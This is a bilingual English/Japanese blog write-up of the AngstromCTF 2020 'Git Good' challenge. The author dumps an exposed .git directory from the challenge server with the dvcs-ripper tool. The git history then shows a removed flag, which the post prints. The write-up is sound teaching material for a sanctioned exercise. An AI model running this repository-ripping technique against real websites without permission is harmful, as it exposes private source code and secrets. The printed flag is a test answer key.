はまやんはまやんはまやん

hamayanhamayan's blog

Git Good [AngstromCTF 2020]

https://ctftime.org/task/10758

日本語は下

Writeup in English

Required Knowledge

  • Git

Writeup

f:id:hamayanhamayan:20200320044310p:plain

This only comes out. Even if you look at the HTTP response, there is only information about what you are doing with Express + nginx. And because it's index.html, we can't find anything strange.

Return to the question sentence.

Did you know that angstrom has a git repo for all the challenges? I noticed that clam committed a very work in progress challenge so I thought it was worth sharing.

The writer use the word "git". Is there a way to get git's data?

【2019年】CTF Web問題の攻撃手法まとめ (Web問題のwriteupぜんぶ読む) - こんとろーるしーこんとろーるぶい
I found!

kost/dvcs-ripper: Rip web accessible (distributed) version control systems: SVN/GIT/HG...
I use this, but recently I can build the environment with docker. (Great…)

docker run -it k0st/alpine-dvcs-ripper /bin/bash
bash-4.3$

Ready for use with this. Execute the command described in the document.

bash-4.3$ rip-git.pl -v -u https://gitgood.2020.chall.actf.co/.git/
[i] Downloading git files from https://gitgood.2020.chall.actf.co/.git/
[i] Auto-detecting 404 as 200 with 3 requests
[i] Getting correct 404 responses
[i] Using session name: zqWbzkQI
[d] found COMMIT_EDITMSG
[d] found config
[d] found description
[d] found HEAD
[d] found index
[!] Not found for packed-refs: 404 Not Found
[!] Not found for objects/info/alternates: 404 Not Found
[!] Not found for info/grafts: 404 Not Found
[d] found logs/HEAD
[d] found objects/6b/3c94c0b90a897f246f0f32dec3f5fd3e40abb5
[d] found objects/e9/75d678f209da09fff763cd297a6ed8dd77bb35
[d] found refs/heads/master
[!] found info file for packs, trying to process them: objects/info/packs
[i] Running git fsck to check for missing items
Checking object directories: 100% (256/256), done.
error: 9402d143d3d7998247c95597b63598ce941e7bcb: invalid sha1 pointer in cache-tree
[d] found objects/c2/658d7d1b31848c3b71960543cb0368e56cd4c7
[d] found objects/63/8887a54973265c428cd51ce6dfd48f196d91c4
[d] found objects/24/7c9d491c0d2d6da5e93afcd0681b3edd7ccd70
[d] found objects/49/b319c37dc674bca682cab0f2506473dda6bd9a
[d] found objects/8f/08af35205d0ba80e94b4f4306311039d62e138
[d] found objects/94/02d143d3d7998247c95597b63598ce941e7bcb
[d] found objects/b6/30430d9d393a6b143af2839fd24ac2118dba79
[d] found objects/78/9fa5caf452f5f6f25bfa9b1c0ab1d593dce1b3
[i] Got items with git fsck: 8, Items fetched: 8
[i] Running git fsck to check for missing items
Checking object directories: 100% (256/256), done.
[d] found objects/0f/52598006f9cdb21db2f4c8d44d70535630289b
[i] Got items with git fsck: 1, Items fetched: 1
[i] Running git fsck to check for missing items
Checking object directories: 100% (256/256), done.
[i] Got items with git fsck: 0, Items fetched: 0
[!] No more items to fetch. That's it!
bash-4.3$ ls
index.html         index.js           package-lock.json  package.json       thisistheflag.txt

Oh, amazing. I was really able to git clone.

bash-4.3$ cat thisistheflag.txt
There used to be a flag here...

OK. See logs.

bash-4.3$ git log
[[33mcommit e975d678f209da09fff763cd297a6ed8dd77bb35[[m
Author: aplet123 <noneof@your.business>
Date:   Sat Mar 7 16:27:44 2020 +0000

    Initial commit

[[33mcommit 6b3c94c0b90a897f246f0f32dec3f5fd3e40abb5[[m
Author: aplet123 <noneof@your.business>
Date:   Sat Mar 7 16:27:24 2020 +0000

    haha I lied this is the actual initial commit

The latest comment is Initial Commit, but there is a commit before that. I guess it is a situation in that the commit message is modified.

bash-4.3$ git diff 6b3c94c0b90a897f246f0f32dec3f5fd3e40abb5
[[1mdiff --git a/thisistheflag.txt b/thisistheflag.txt[[m
[[1mindex 0f52598..247c9d4 100644[[m
[[1m--- a/thisistheflag.txt[[m
[[1m+++ b/thisistheflag.txt[[m
[[36m@@ -1,3 +1 @@[[m
[[31m-actf{b3_car3ful_wh4t_y0u_s3rve_wi7h}[[m
[[31m-[[m
[[31m-btw this isn't the actual git server[[m
[[32m+[[m[[32mThere used to be a flag here...[[m

I feel garbled, but the flag comes out. Probably the color designation has come out.

以下、日本語

前提知識

  • Gitの知識

解説

f:id:hamayanhamayan:20200320044310p:plain

これが出るだけ。 HTTPレスポンスを見てもExpress+nginxでやってんのね位の情報しかない。 しかも、index.htmlなので、変なところも見当たらない。

問題文に立ち返ってみる。

Did you know that angstrom has a git repo for all the challenges? I noticed that clam committed a very work in progress challenge so I thought it was worth sharing.

やたらgitが押されている。 もしかして、gitのデータ抜く方法ある?

【2019年】CTF Web問題の攻撃手法まとめ (Web問題のwriteupぜんぶ読む) - こんとろーるしーこんとろーるぶい
あるやんけ! .gitとかをハックするのね。なるほど。

kost/dvcs-ripper: Rip web accessible (distributed) version control systems: SVN/GIT/HG...
これを使うのだが、昨今はdockerで環境構築ができてしまう。(素晴らしい…)

docker run -it k0st/alpine-dvcs-ripper /bin/bash
bash-4.3$

これで使用準備完了(すげぇ、現代の力感)
ドキュメントに書いてあるコマンドを実行する。

bash-4.3$ rip-git.pl -v -u https://gitgood.2020.chall.actf.co/.git/
[i] Downloading git files from https://gitgood.2020.chall.actf.co/.git/
[i] Auto-detecting 404 as 200 with 3 requests
[i] Getting correct 404 responses
[i] Using session name: zqWbzkQI
[d] found COMMIT_EDITMSG
[d] found config
[d] found description
[d] found HEAD
[d] found index
[!] Not found for packed-refs: 404 Not Found
[!] Not found for objects/info/alternates: 404 Not Found
[!] Not found for info/grafts: 404 Not Found
[d] found logs/HEAD
[d] found objects/6b/3c94c0b90a897f246f0f32dec3f5fd3e40abb5
[d] found objects/e9/75d678f209da09fff763cd297a6ed8dd77bb35
[d] found refs/heads/master
[!] found info file for packs, trying to process them: objects/info/packs
[i] Running git fsck to check for missing items
Checking object directories: 100% (256/256), done.
error: 9402d143d3d7998247c95597b63598ce941e7bcb: invalid sha1 pointer in cache-tree
[d] found objects/c2/658d7d1b31848c3b71960543cb0368e56cd4c7
[d] found objects/63/8887a54973265c428cd51ce6dfd48f196d91c4
[d] found objects/24/7c9d491c0d2d6da5e93afcd0681b3edd7ccd70
[d] found objects/49/b319c37dc674bca682cab0f2506473dda6bd9a
[d] found objects/8f/08af35205d0ba80e94b4f4306311039d62e138
[d] found objects/94/02d143d3d7998247c95597b63598ce941e7bcb
[d] found objects/b6/30430d9d393a6b143af2839fd24ac2118dba79
[d] found objects/78/9fa5caf452f5f6f25bfa9b1c0ab1d593dce1b3
[i] Got items with git fsck: 8, Items fetched: 8
[i] Running git fsck to check for missing items
Checking object directories: 100% (256/256), done.
[d] found objects/0f/52598006f9cdb21db2f4c8d44d70535630289b
[i] Got items with git fsck: 1, Items fetched: 1
[i] Running git fsck to check for missing items
Checking object directories: 100% (256/256), done.
[i] Got items with git fsck: 0, Items fetched: 0
[!] No more items to fetch. That's it!
bash-4.3$ ls
index.html         index.js           package-lock.json  package.json       thisistheflag.txt

おー、すごい。ほんとにgit cloneできた。

bash-4.3$ cat thisistheflag.txt
There used to be a flag here...

ほーん。ログ見るか。

bash-4.3$ git log
[[33mcommit e975d678f209da09fff763cd297a6ed8dd77bb35[[m
Author: aplet123 <noneof@your.business>
Date:   Sat Mar 7 16:27:44 2020 +0000

    Initial commit

[[33mcommit 6b3c94c0b90a897f246f0f32dec3f5fd3e40abb5[[m
Author: aplet123 <noneof@your.business>
Date:   Sat Mar 7 16:27:24 2020 +0000

    haha I lied this is the actual initial commit

最新がInitial Commitとなっているが、その前にコミットがある。 コミットメッセージ修正したって設定なんだろうなぁ

bash-4.3$ git diff 6b3c94c0b90a897f246f0f32dec3f5fd3e40abb5
[[1mdiff --git a/thisistheflag.txt b/thisistheflag.txt[[m
[[1mindex 0f52598..247c9d4 100644[[m
[[1m--- a/thisistheflag.txt[[m
[[1m+++ b/thisistheflag.txt[[m
[[36m@@ -1,3 +1 @@[[m
[[31m-actf{b3_car3ful_wh4t_y0u_s3rve_wi7h}[[m
[[31m-[[m
[[31m-btw this isn't the actual git server[[m
[[32m+[[m[[32mThere used to be a flag here...[[m

文字化けしてる感があるけど、フラグが出てくる。 たぶん色指定が出てきちゃってるんだろうけど、せっかくならちゃんと見たいな。 何で見ればいいだろう